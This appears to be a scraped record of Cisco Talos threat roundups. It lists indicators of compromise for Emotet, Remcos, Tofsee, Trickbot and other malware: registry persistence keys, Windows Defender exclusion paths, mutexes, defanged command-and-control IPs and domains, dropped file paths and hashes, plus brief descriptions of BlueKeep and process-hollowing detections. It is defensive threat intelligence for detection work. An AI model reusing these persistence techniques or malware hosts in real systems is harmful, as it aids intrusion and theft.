\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION \nValue Name: jfghdug_ooetvtgk ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: JudCsgdy ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: Userinit ` | 2 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 16 \n`shell.{<random GUID>}` | 11 \n`{<random GUID>}` | 5 \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 3 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 3 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 3 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`178[.]128[.]255[.]179` | 16 \n`178[.]33[.]158[.]0/27` | 16 \n`178[.]33[.]159[.]0/27` | 16 \n`178[.]33[.]160[.]0/25` | 16 \n`104[.]24[.]104[.]254` | 13 \n`104[.]24[.]105[.]254` | 11 \n`34[.]206[.]50[.]228` | 8 \n`54[.]164[.]0[.]55` | 6 \n`208[.]67[.]222[.]222` | 3 \n`172[.]217[.]7[.]206` | 2 \n`86[.]105[.]1[.]11` | 2 \n`172[.]217[.]11[.]46` | 1 \n`46[.]165[.]221[.]154` | 1 \n`91[.]195[.]240[.]13` | 1 \n`195[.]201[.]179[.]207` | 1 \n`192[.]3[.]8[.]218` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 16 \n`bitaps[.]com` | 16 \n`chain[.]so` | 16 \n`btc[.]blockr[.]io` | 16 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 11 \n`resolver1[.]opendns[.]com` | 3 \n`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 3 \n`myip[.]opendns[.]com` | 3 \n`wdwefwefwwfewdefewfwefw[.]onion` | 2 \n`ahrkvtgc[.]com` | 1 \n`fhvkufnnrlyfvx[.]com` | 1 \n`shebkucvrunporc[.]com` | 1 \n`hd63ueor8473y[.]com` | 1 \n`qegdtnvuanlyid[.]com` | 1 \n`gcijrxipe[.]com` | 1 \n`ogltynjmtfiu[.]com` | 1 \n`rlkeqcsygmmglv[.]com` | 1 \n`wglxvkpybhnxhfv[.]com` | 1 \n`aynycxbgodmwi[.]com` | 1 \n`uahvwkjphhklqigod[.]com` | 1 \n`en[.]voltster12v[.]com` | 1 \n`cloud[.]pathwaystopromise[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 16 \n`%TEMP%\\d19ab989\\4710.tmp` | 16 \n`%TEMP%\\d19ab989\\a35f.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.tmp` | 16 \n`%TEMP%\\tmp<random, matching [A-F0-9]{1,4}>.bmp` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt` | 16 \n`<dir>\\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta` | 16 \n`<dir>\\<random, matching [A-Z0-9\\-]{10}.[A-F0-9]{4}> (copy)` | 11 \n \n#### File Hashes\n\n` 00fd6d5030b6f36f2acef17f933bf87a5e83104e86edc18467318362fe41bda0 0db052f343bb2c323603fd34eea55262f5448450feaf0dbb03e77da1d1da204e 
1beb4d8646023322d8eefba6bee5d899f375bd099050367e8af5321eda512db5 1e78866a82b6016b280f4935ab6aa8e6d59456c5fdb4900ef456cb6216fba878 2766aa41ce912acac61bc342873b1d016c016780600846b77ccee98eaea0a0c1 316c4f6ce0478622772c16aa1821297569a27d52a8ab65262bc1702e864d3cff 367afe107f332d7fd9676b75a76624a2378758104316278a28984ba1815073b2 36bee89b83bc3b628abb726b4530a7fda8b86448594543532ec303f659cd1c1d 36f70b90e9ef4c34440e13c064d05dc0996debd74a7361109532bfda65108ab6 382d8c432cf11339a41b6c0371a226b7567620c6440b0ebdf7dc1610db4ec3c4 38bc3877ec4f87307ccb3d23dc7ea58b117fccfa1ccba938fa9dcff4bb956fe2 4a2803f8ddf258eb4d41ff15f617307cc6eda54bd4e635b0314c9706cff9007e 4b9c203a3f4a7129d0701c5f3e8266d217c836b497c7acf762ad7f8eab508349 4bf2851749232054a7f08faa294520d3bf372b84eb5d20707add176acb1e9aa6 54852be80e90db1d2550128bdf82028befcdf1340da2a1add061e7f6027eb272 552a32a57b59b7498a79f187d2cbfdf7c797395024392b7f76d7b1fff94fea8b 576a3ddc924aea581818f397bca1fe1a3788f892d81b8a2287c03566bc7e6242 5d2e3adf40ec1ae0f6032213a8bb27be9eaf5ae99a6f09239088e8c47944ed02 7275da6b777a1c5c9392766d7fec3c4f0b07e93af161d11b7da000e6157178b0 73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001 7420f8c4f266ebd29b867ef980309bfe8a1d8845f7683e6f8db734c5812eb5e8 89fc2e256c70fb0235ebb0a9daa3f096ba7722fd06b7b0866a1e87b1ea003f79 a04e9bf2aed6eef853c5a5f2ce6131963cb7cd15971c02e6f2afa18846737e74 a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c ad4a8230c0a8d5deb3d8253ef0e2a9c41531eb1560e538ef8cb1a5ff56e7cb27 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gpxC0L9pe_I/XdgZwRwyC-I/AAAAAAAAC7k/OcpcZwodBgQcxqeiDUdrXHh72ZnvXUZVgCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_amp.png>)\n\n \n\n\n 
\n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-ARF_WT0-Mlw/XdgZ1jhkeDI/AAAAAAAAC7o/jxa_5xAENAoebgaF25kMQRg6n-QCBSgSQCLcBGAsYHQ/s1600/73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001_umbrella.png>)\n\n \n\n\n \n\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-otI_RS-9_zo/XdgZ61uz6XI/AAAAAAAAC7s/TZ-WFRzqNa0JafWIdy5Jjm0DFZ7DS67RACLcBGAsYHQ/s1600/a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c_malware.png>)\n\n \n\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Remcos-7395733-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\RECENT FILE LIST ` | 24 \n`<HKCU>\\SOFTWARE\\LOCAL APPWIZARD-GENERATED APPLICATIONS\\MYIMGAPP\\SETTINGS ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Snk ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: exepath ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT \nValue Name: licence ` | 19 \n`<HKCU>\\SOFTWARE\\XLR4615DFT-CRBSFT ` | 19 \n`<HKCU>\\SOFTWARE\\NETWIRE ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MServices ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: HostId ` | 1 \n`<HKCU>\\SOFTWARE\\NETWIRE \nValue Name: Install Date ` | 1 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 19 \n`XLR4615DFT-CRBSFT` | 19 \n`IMYGdLWM` | 1 \n`Global\\00430b21-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\006bff81-08fc-11ea-a007-00501e3ae7b5` | 1 \n`Global\\03cef101-08fc-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`186[.]170[.]64[.]85` | 17 \n`186[.]170[.]70[.]152` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences
---|---
`proyectobasevirtualcol[.]com` | 19
`recuperaciondecartera[.]website` | 1

Files and/or directories created | Occurrences
---|---
`%TEMP%\install.vbs` | 19
`%APPDATA%\System32` | 19
`%APPDATA%\System32\Snk.exe` | 19
`%APPDATA%\Runtime3` | 19
`%APPDATA%\Runtime3\1627.dat` | 19
`%TEMP%\<random, matching '[a-z]{4,9}'>.exe` | 15
`%TEMP%\8D6B.dmp` | 1
`%TEMP%\8adb_appcompat.txt` | 1
`%APPDATA%\Install` | 1
`%APPDATA%\Install\MServicesNet.exe` | 1

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
WSA | N/A

#### Screenshots of Detection

#### AMP

* * *

### Win.Dropper.Tofsee-7402230-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config3`) | 3
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` | 3
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config1`) | 3
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config2`) | 3
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` (Value Name: `Config0`) | 3
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (Value Name: `C:\Windows\SysWOW64\ibpvucix`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `Type`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `Start`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `ErrorControl`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `DisplayName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `WOW64`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `ObjectName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IBPVUCIX` (Value Name: `Description`) | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (Value Name: `C:\Windows\SysWOW64\exlrqyet`) | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS` (Value Name: `C:\Windows\SysWOW64\nguazhnc`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `Type`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `Start`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `ErrorControl`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `DisplayName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `WOW64`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `ObjectName`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EXLRQYET` (Value Name: `Description`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC` (Value Name: `Type`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC` (Value Name: `Start`) | 1
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NGUAZHNC` (Value Name: `ErrorControl`) | 1

Mutexes | Occurrences
---|---
`{37529D08-A67E-40B3-B0F2-EB87331B47F5}` | 9
`Global\<random guid>` | 7
`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 1
`A238FB802-231ABE6B-F2351354-74D8EB40-AEDEC6C4` | 1

IP Addresses contacted by malware. Does not indicate maliciousness.

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness.

*See JSON for more IOCs

Files and/or directories created | Occurrences
---|---
`%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp` | 13
`%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 13
`%System32%\Tasks\Intel Rapid` | 9
`%APPDATA%\Intel Rapid` | 9
`%APPDATA%\Intel Rapid\IntelRapid.exe` | 9
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\IntelRapid.lnk` | 9
`%HOMEPATH%\Start Menu\Programs\Startup\IntelRapid.lnk` | 7
`%TEMP%\CC4F.tmp` | 7
`%TEMP%\<random, matching '[a-z]{4,9}'>.exe` | 3
`%APPDATA%\Microsoft\Crypto\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Document Building Blocks\1033\14\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Document Building Blocks\1033\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Document Building Blocks\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Excel\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\HTML Help\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Internet Explorer\Quick Launch\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Internet Explorer\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Internet Explorer\UserData\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\MMC\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Office\Recent\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Office\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Outlook\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\PowerPoint\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Proof\RyukReadMe.html` | 1
`%APPDATA%\Microsoft\Protect\RyukReadMe.html` | 1

*See JSON for more IOCs

#### File Hashes

#### Coverage

Product | Protection
---|---
AMP |
Cloudlock | N/A
CWS |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
WSA |

#### Screenshots of Detection

#### AMP

#### Umbrella

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

CVE-2019-0708 detected - (15989)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.

Excessively long PowerShell command detected - (760)

A PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows.
Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

Process hollowing detected - (407)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the child's memory is cleared and filled in with memory from the parent instead.

Kovter injection detected - (347)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

IcedID malware detected - (297)

IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and/or other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif. Systems infected with IcedID should also be scanned for additional malware infections.

Gamarue malware detected - (183)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (104)

Installcore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.

Dealply adware detected - (60)

DealPly is adware that claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Emotet malware detected - (45)

Emotet is a banking Trojan that first appeared in the summer of 2014. It uses an Automatic Transfer System (ATS) to steal money from a victim's bank account. The Trojan is distributed through spam that includes a malicious attachment or a link that downloads the Trojan. Emotet uses modules, downloaded by the original Trojan, to grab Microsoft Outlook information, modify HTTP/HTTPS traffic and distribute spam. Once executed, it checks for virtual machine processes and injects code into the "Explorer.exe" process. Then it reaches out to its command network to download its modules, each of which can be run without the original loader.

Special Search Offer adware - (31)

Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.
ID TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22 Type talosblog Title Threat Roundup for November 15 to November 22 Published 2019-11-22T09:57:20 Modified 2019-11-22T09:57:20 CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Href http://feedproxy.google.com/~r/feedburner/Talos/~3/EYfImS9iSMQ/threat-roundup-1115-1122.html

Type talosblog Last seen 2020-02-14T21:31:51 CVE list CVE-2019-0708
Description
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 7 and Feb. 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>).

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Doc.Downloader.Emotet-7580217-0 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.ZBot-7578445-1 | Packed | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Dropper.Trickbot-7582953-1 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.NetWire-7578556-0 | Dropper | NetWire is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Gamarue-7580018-0 | Packed | Gamarue, also known as Andromeda, is a botnet used to spread malware, steal information and perform activities such as click fraud.
Win.Trojan.Kovter-7581113-1 | Trojan | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
\nPUA.Win.Trojan.Bladabindi-7581164-0 | Trojan | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. \nWin.Packed.Ponystealer-7581286-0 | Packed | Ponystealer is known to be able to steal credentials from more than 100 different applications and may also install other malware such as a remote access tool (RAT). \nWin.Ransomware.Cerber-7582361-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, other file extensions are used. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7580217-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 20 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 5 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` 
| 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: c019706b ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 18 \n`Global\\M98B68E3C` | 18 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]95` | 3 \n`157[.]7[.]107[.]4` | 4 \n`190[.]228[.]29[.]115` | 3 \n`208[.]84[.]244[.]49` | 4 \n`105[.]187[.]200[.]240` | 4 \n`23[.]227[.]38[.]32` | 3 \n`72[.]18[.]130[.]169` | 3 \n`69[.]175[.]10[.]34` | 3 \n`83[.]143[.]28[.]130` | 4 \n`5[.]2[.]81[.]171` | 3 \n`41[.]191[.]232[.]22` | 4 \n`23[.]21[.]177[.]74` | 3 \n`89[.]97[.]236[.]171` | 3 \n`190[.]196[.]217[.]50` | 3 \n`195[.]57[.]58[.]70` | 4 \n`206[.]183[.]111[.]62` | 3 \n`192[.]185[.]181[.]168` | 4 \n`77[.]88[.]21[.]158` | 4 \n`87[.]250[.]255[.]212` | 3 \n`46[.]28[.]106[.]9` | 3 \n`77[.]88[.]21[.]37` | 3 \n`83[.]143[.]24[.]50` | 4 \n`86[.]96[.]229[.]28/31` | 3 \n`74[.]208[.]5[.]14/31` | 3 \n`173[.]194[.]204[.]108/31` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]outlook[.]com` | 3 \n`mail[.]outlook[.]com` | 3 \n`smtp[.]secureserver[.]net` | 4 \n`mailv[.]emirates[.]net[.]ae` | 3 \n`pop-mail[.]outlook[.]com` | 3 \n`pop[.]secureserver[.]net` | 3 \n`mail[.]secureserver[.]net` | 3 \n`secure[.]emailsrvr[.]com` | 3 \n`pop[.]yandex[.]com[.]tr` | 3 \n`smtp-mail[.]outlook[.]com` | 3 \n`outlook[.]office365[.]com` | 3 \n`mail[.]telkomsa[.]net` | 4 \n`smtp[.]yandex[.]com[.]tr` | 4 \n`mail[.]yandex[.]com` | 3 \n`mail[.]municipiodeyaguachi[.]gob[.]ec` | 3 \n`pop[.]vbn[.]co[.]bw` | 4 \n`mail[.]in[.]cpm-int[.]com` | 3 \n`mail[.]siajewellery[.]com` | 3 \n`mail[.]firstgourmet[.]com` | 3 \n`mail[.]lolipop[.]jp` | 3 \n`pop3[.]lolipop[.]jp` | 3 \n`mail[.]doves[.]co[.]za` | 3 \n`mail[.]vbn[.]co[.]bw` | 4 \n`smtp[.]vbn[.]co[.]bw` | 3 \n`mail[.]domverconsultants[.]com` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\298.exe` | 20 \n`%SystemRoot%\\SysWOW64\\AppIdPolicyEngineApi` | 1 \n`%SystemRoot%\\SysWOW64\\msctf` | 1 \n`%SystemRoot%\\SysWOW64\\cipher` | 1 \n`%SystemRoot%\\SysWOW64\\msftedit` | 1 \n`%SystemRoot%\\SysWOW64\\iprtrmgr` | 1 \n`%SystemRoot%\\SysWOW64\\xpsservices` | 1 \n`%SystemRoot%\\SysWOW64\\uexfat` | 1 \n`%ProgramData%\\UmCbkT.exe` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcmonitor` | 1 \n`%SystemRoot%\\SysWOW64\\psbase` | 1 \n`%SystemRoot%\\SysWOW64\\f3ahvoas` | 1 \n`%SystemRoot%\\SysWOW64\\XpsRasterService` | 1 \n`%SystemRoot%\\SysWOW64\\NlsData0414` | 1 \n`%SystemRoot%\\SysWOW64\\rnr20` | 1 \n`%SystemRoot%\\SysWOW64\\KBDIULAT` | 1 \n`%SystemRoot%\\SysWOW64\\KBDHE` | 1 \n`%TEMP%\\1A19.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\dhcpcore` | 1 \n`%TEMP%\\2D63.tmp` | 1 \n`%SystemRoot%\\SysWOW64\\mydocs` | 1 \n`%SystemRoot%\\SysWOW64\\wininet` | 1 \n`%SystemRoot%\\SysWOW64\\twinui` | 1 \n`%SystemRoot%\\SysWOW64\\ureg` | 1 \n \n#### File Hashes\n\n` 0031f41b3edde21592bc42365e01689f23a73a634d7c8ffc0807e60e1a189a38 
006766d9879f75d74de2c385ce8418fb838989af2046d8d329ad6ae7dc6d26eb 00efa3f945cfd76037639b91f2fd9208525eb377235440544c29e2c0d93a1c19 012b10d254c825b01bb0ae5f604bc59de7c0cac54bdd17b7f7dcd3e63ce89c66 024b77f2ff26f37e132e450a1d9a04fb94be78ecb0459afc5a09638efbec7cc5 02f55988f95d388efd2da064560eb349eab243dfc8eb806273850d707d74cb07 05c41c7550b30e8074e29985b3d4a75c209156334b93647f1e5d56a77cffc4f2 06a35e532b1e957c8fc2d44c2c370769fcc829479d90cb342b59dd7be17f58a1 0b1c60e5511737fbed55e9ce90163e111d882ae5db69008c010e5cb42e79d81b 0b878e218014a87bc4674a3f8c7113b207cf3e3203ba565c9e3fcf62cb5f18d6 0d45faaf1c2a3cd60340c2d9436fa60571f024ce17cb29089a538b3294aa8a3f 15d9234eeea6f729bd2a36b17e5cc5de58baa05a3ce2258675dd2620e4c28fb1 18195f809af26a3950879186304039c5592a8514671bb32cd6d45d7bf3014e4a 18c98bca74464c6bbe992bcffa838b6224e42419eac19e69ca0da0514968ccd6 18d15aa6b4831299695ceb06dd8ad7398dc48729314ecc0219a75833cc693dd4 196e94c02598dfcfaaf2b62c410c7d64eea908cc19c3af922277e2f1c5f3320f 19c05a961a7babe4bf5ef5889e358ba0df4b790a0b73544d5961bfef2e7d3451 1e0452e2654c5fb4bd01ce92783004202dbc022604b52c54c81f93147005a6f1 21739583fe20050c9ea0aab5c23843a68b3d000a658b72f3148a98e4c0ba330d 2576c16870fedf186a782acae71056a381f01efbdd0c7df30a36daf526072368 26c3ffa34af8692430389b2132228ac0ad44b4a9cb2cf0a3c736468bf1ad1c1e 294233e4170042ad9ca33b8e5a227fc3e4033be090a25953a2d0e013f06e0a52 31522d4b3a684be27b58cddf1bf17be3f5cb34d5fc6fac0baba7b5d1aaf28e73 